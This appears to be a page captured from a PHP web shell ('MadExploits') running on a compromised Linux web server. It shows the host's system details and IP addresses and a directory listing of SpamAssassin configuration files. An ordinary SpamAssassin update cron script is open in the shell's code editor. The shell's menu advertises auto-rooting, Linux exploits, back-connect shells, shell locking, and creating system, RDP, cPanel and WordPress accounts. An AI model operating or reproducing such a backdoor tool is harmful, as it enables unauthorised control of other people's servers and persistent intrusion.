Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
spamassassin /
[ HOME SHELL ]
Name
Size
Permission
Action
10_default_prefs.cf
8.48
KB
-rw-r--r--
10_hasbase.cf
2.37
KB
-rw-r--r--
20_advance_fee.cf
7.43
KB
-rw-r--r--
20_aux_tlds.cf
8.8
KB
-rw-r--r--
20_body_tests.cf
6.84
KB
-rw-r--r--
20_compensate.cf
1.85
KB
-rw-r--r--
20_dnsbl_tests.cf
9.5
KB
-rw-r--r--
20_drugs.cf
14.7
KB
-rw-r--r--
20_dynrdns.cf
11.22
KB
-rw-r--r--
20_fake_helo_tests.cf
8.31
KB
-rw-r--r--
20_freemail.cf
2.94
KB
-rw-r--r--
20_freemail_domains.cf
41.82
KB
-rw-r--r--
20_head_tests.cf
25.74
KB
-rw-r--r--
20_html_tests.cf
10.27
KB
-rw-r--r--
20_imageinfo.cf
5.16
KB
-rw-r--r--
20_mailspike.cf
2.6
KB
-rw-r--r--
20_meta_tests.cf
3.25
KB
-rw-r--r--
20_net_tests.cf
1.83
KB
-rw-r--r--
20_phrases.cf
7.98
KB
-rw-r--r--
20_porn.cf
2.01
KB
-rw-r--r--
20_ratware.cf
15.59
KB
-rw-r--r--
20_uri_tests.cf
5.54
KB
-rw-r--r--
20_vbounce.cf
18.82
KB
-rw-r--r--
23_bayes.cf
2.49
KB
-rw-r--r--
25_accessdb.cf
1.51
KB
-rw-r--r--
25_antivirus.cf
1.5
KB
-rw-r--r--
25_asn.cf
1.51
KB
-rw-r--r--
25_dcc.cf
2.27
KB
-rw-r--r--
25_dkim.cf
4.3
KB
-rw-r--r--
25_hashcash.cf
2.86
KB
-rw-r--r--
25_pyzor.cf
1.28
KB
-rw-r--r--
25_razor2.cf
3.31
KB
-rw-r--r--
25_replace.cf
7.57
KB
-rw-r--r--
25_spf.cf
3.35
KB
-rw-r--r--
25_textcat.cf
1.73
KB
-rw-r--r--
25_uribl.cf
10.14
KB
-rw-r--r--
30_text_de.cf
27.12
KB
-rw-r--r--
30_text_fr.cf
19.89
KB
-rw-r--r--
30_text_it.cf
1.81
KB
-rw-r--r--
30_text_nl.cf
20.94
KB
-rw-r--r--
30_text_pl.cf
17.34
KB
-rw-r--r--
30_text_pt_br.cf
44.46
KB
-rw-r--r--
50_scores.cf
36.92
KB
-rw-r--r--
60_adsp_override_dkim.cf
9.02
KB
-rw-r--r--
60_awl.cf
1.27
KB
-rw-r--r--
60_shortcircuit.cf
2.13
KB
-rw-r--r--
60_whitelist.cf
4.87
KB
-rw-r--r--
60_whitelist_dkim.cf
6.05
KB
-rw-r--r--
60_whitelist_spf.cf
3.5
KB
-rw-r--r--
60_whitelist_subject.cf
1.87
KB
-rw-r--r--
72_active.cf
199.42
KB
-rw-r--r--
72_scores.cf
9.65
KB
-rw-r--r--
73_sandbox_manual_scores.cf
2.61
KB
-rw-r--r--
STATISTICS-set0-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set1-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set2-72_scores.cf.t...
0
B
-rw-r--r--
STATISTICS-set3-72_scores.cf.t...
0
B
-rw-r--r--
languages
99.1
KB
-rw-r--r--
local.cf
2.16
KB
-rw-r--r--
regression_tests.cf
2.71
KB
-rw-r--r--
sa-update-pubkey.txt
4.67
KB
-rw-r--r--
sa-update.cron
3.07
KB
-rwxr--r--
user_prefs.template
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sa-update.cron
#!/bin/bash # *** DO NOT MODIFY THIS FILE *** # # /etc/mail/spamassassin/channel.d/*.conf # Place files here to add custom channels. # # Proceed with sa-update if spam daemon is running or forced in /etc/sysconfig/sa-update unset SAUPDATE OPTIONS DEBUG NOTIFY_UPD [ -f /etc/sysconfig/sa-update ] && . /etc/sysconfig/sa-update [ "$SAUPDATE" = "no" ] && exit 0 for daemon in spamd amavisd spampd; do /usr/bin/pgrep -f $daemon >& /dev/null [ $? -eq 0 ] && SAUPDATE=yes done systemctl --quiet is-active mimedefang.service; [ $? -eq 0 ] && SAUPDATE=yes # Skip sa-update if daemon not detected [ -z "$SAUPDATE" ] && exit 0 # sa-update must create keyring if [ ! -d /etc/mail/spamassassin/sa-update-keys ]; then sa-update fi # Initialize Channels and Keys CHANNELLIST="" KEYLIST="" # Process each channel defined in /etc/mail/spamassassin/channel.d/ for file in /etc/mail/spamassassin/channel.d/*.conf; do [ ! -f "$file" ] && continue # Validate config file PREFIXES="CHANNELURL KEYID BEGIN" for prefix in $PREFIXES; do if ! grep -q "$prefix" $file; then echo "ERROR: $file missing $prefix" exit 255 fi done . "$file" #echo "CHANNELURL=$CHANNELURL" #echo "KEYID=$KEYID" CHANNELLIST="$CHANNELLIST $CHANNELURL" KEYLIST="$KEYLIST $KEYID" sa-update --import "$file" done # Sleep random amount of time before proceeding to avoid overwhelming the servers sleep $(expr $RANDOM % 7200) unset arglist # Run sa-update on each channel, restart spam daemon if success for channel in $CHANNELLIST; do arglist="$arglist --channel $channel" done for keyid in $KEYLIST; do arglist="$arglist --gpgkey $keyid" done /usr/bin/sa-update $OPTIONS $arglist status=$? now=`date +"%d-%b-%Y %T"` # cron runs this script tee /var/log/sa-update.log # We want to always write to the log, but only send mail # as configured. if [ $status -eq 0 ]; then if [ -n "$DEBUG" -o -n "$NOTIFY_UPD" ]; then echo "$now: SpamAssassin: Update processed successfully" else echo "$now: SpamAssassin: Update processed successfully" >>/var/log/sa-update.log fi systemctl condrestart spamassassin.service >& /dev/null [ -f /usr/lib/systemd/system/amavisd.service ] && systemctl condrestart amavisd.service >& /dev/null systemctl --quiet is-active mimedefang.service; [ $? -eq 0 ] && systemctl reload mimedefang.service >& /dev/null [ -f /usr/lib/systemd/system/spampd.service ] && systemctl condrestart spampd.service >& /dev/null exit $status fi if [ $status -eq 1 ]; then if [ -n "$DEBUG" ]; then echo "$now: SpamAssassin: No update available" else echo "$now: SpamAssassin: No update available" >>/var/log/sa-update.log fi exit $status fi if [ $status -eq 2 ]; then echo "$now: SpamAssassin: Problem applying update - pre files failed lint check" exit $status fi if [ $status -eq 4 ]; then echo "$now: SpamAssassin: Update available, but download or extract failed" exit $status fi echo "$now: SpamAssassin: Unknown error code $status from sa-update" exit $status
Close